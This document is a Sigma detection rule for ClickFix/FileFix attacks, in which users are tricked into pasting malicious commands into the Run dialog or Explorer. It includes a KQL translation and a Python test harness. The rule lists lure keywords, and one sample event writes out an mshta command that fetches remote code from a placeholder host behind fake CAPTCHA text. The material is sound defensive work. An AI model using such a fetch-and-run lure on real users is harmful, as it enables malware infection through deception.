Detects suspicious execution patterns where users are tricked into running malicious commands via clipboard manipulation, either through the Windows Run dialog (ClickFix) or File Explorer address bar
```yaml
title: Suspicious ClickFix/FileFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
related:
    - id: f5fe36cf-f1ec-4c23-903d-09a3110f6bbb
      type: similar
status: experimental
description: |
    Detects suspicious execution patterns where users are tricked into running malicious commands via clipboard manipulation, either through the Windows Run dialog (ClickFix) or File Explorer address bar (FileFix).
    Attackers leverage social engineering campaigns, such as fake CAPTCHA challenges or urgent alerts, encouraging victims to paste clipboard contents, often executing mshta.exe, powershell.exe, or similar commands to infect systems.
references:
    - https://github.com/JohnHammond/recaptcha-phish
    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
    - https://www.scpx.com.au/2025/11/16/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/ # filefix variant
author: montysecurity, Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-11-19
tags:
    - attack.execution
    - attack.t1204.001
    - attack.t1204.004
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
        CommandLine|contains: '#'
    selection_cli_captcha:
        CommandLine|contains:
            - 'account'
            - 'anti-bot'
            - 'botcheck'
            - 'captcha'
            - 'challenge'
            - 'confirmation'
            - 'fraud'
            - 'human'
            - 'identification'
            - 'identificator'
            - 'identity'
            - 'robot'
            - 'validation'
            - 'verification'
            - 'verify'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high
```
Microsoft Sentinel (ASIM) translation of the rule:

```kql
imProcessCreate
| where ((ParentProcessName endswith "\\explorer.exe" or ActingProcessName endswith "\\explorer.exe")
    and TargetProcessCommandLine contains "#")
    and (TargetProcessCommandLine contains "account"
        or TargetProcessCommandLine contains "anti-bot"
        or TargetProcessCommandLine contains "botcheck"
        or TargetProcessCommandLine contains "captcha"
        or TargetProcessCommandLine contains "challenge"
        or TargetProcessCommandLine contains "confirmation"
        or TargetProcessCommandLine contains "fraud"
        or TargetProcessCommandLine contains "human"
        or TargetProcessCommandLine contains "identification"
        or TargetProcessCommandLine contains "identificator"
        or TargetProcessCommandLine contains "identity"
        or TargetProcessCommandLine contains "robot"
        or TargetProcessCommandLine contains "validation"
        or TargetProcessCommandLine contains "verification"
        or TargetProcessCommandLine contains "verify")
```

| Sentinel Table | Notes |
|---|---|
| imProcessCreate | Ensure this data connector is enabled |
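To see exactly what the two selections require of an event, the following Python snippet (an added example, not part of the rule or of the Sigma project) re-implements the detection logic above and runs it over four constructed process_creation events. Only the first event satisfies both `selection_parent` (explorer.exe parent and a `#` in the command line) and `selection_cli_captcha` (a lure keyword); the others each miss one condition. Sigma's `contains`/`endswith` are case-insensitive, which the comparison below mirrors. Field names follow the rule; the event dictionaries and their values are constructed for illustration.

```python
from typing import Optional

# Keyword list copied from the rule's selection_cli_captcha block.
CAPTCHA_KEYWORDS = [
    "account", "anti-bot", "botcheck", "captcha", "challenge", "confirmation",
    "fraud", "human", "identification", "identificator", "identity", "robot",
    "validation", "verification", "verify",
]


def match_clickfix(event: dict) -> Optional[dict]:
    """Evaluate the rule against one process_creation event.

    Sigma string modifiers are case-insensitive by default, so both fields are
    lower-cased before comparison. Returns None when the event does not match,
    otherwise a small dict with the details an analyst wants for triage.
    """
    raw_cmdline = str(event.get("CommandLine", ""))
    parent = str(event.get("ParentImage", "")).lower()
    cmdline = raw_cmdline.lower()

    # selection_parent: spawned by explorer.exe (Run dialog / address bar) and
    # a '#' in the command line, which the lure uses to turn the visible
    # "verification" text into a comment the shell ignores.
    if not parent.endswith("\\explorer.exe") or "#" not in cmdline:
        return None

    # selection_cli_captcha: at least one social-engineering keyword.
    hits = [kw for kw in CAPTCHA_KEYWORDS if kw in cmdline]
    if not hits:
        return None

    # condition: all of selection_* -> both blocks matched.
    return {
        "Image": event.get("Image"),
        "lure_text": raw_cmdline.split("#", 1)[1].strip(),
        "keywords": hits,
    }


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # Run-dialog paste with lure text after '#': matches both selections.
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://example.invalid/v # I am not a robot - Verification ID: 4821"},
    # Same parent and a keyword, but no '#': a user-run script, no match.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\Tools\account-report.ps1"},
    # '#' and a keyword, but the parent is cmd.exe, not explorer.exe: no match.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'powershell.exe -c "Get-Date" # verify clock'},
    # explorer.exe parent and '#', but no lure keyword: no match.
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\notes\todo#1.txt"},
]


def scan(events) -> list:
    """Return the triage records for every event the rule fires on."""
    return [m for m in (match_clickfix(e) for e in events) if m]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"ALERT {alert['Image']}: keywords={alert['keywords']} "
              f"lure='{alert['lure_text']}'")
```

Keeping the matched keywords and the text after `#` in the alert record makes triage faster: the lure string is what the victim saw in the Run dialog, and the keyword set shows which part of the social-engineering vocabulary the rule keyed on, which is also the first place to look if a benign command line ever trips it.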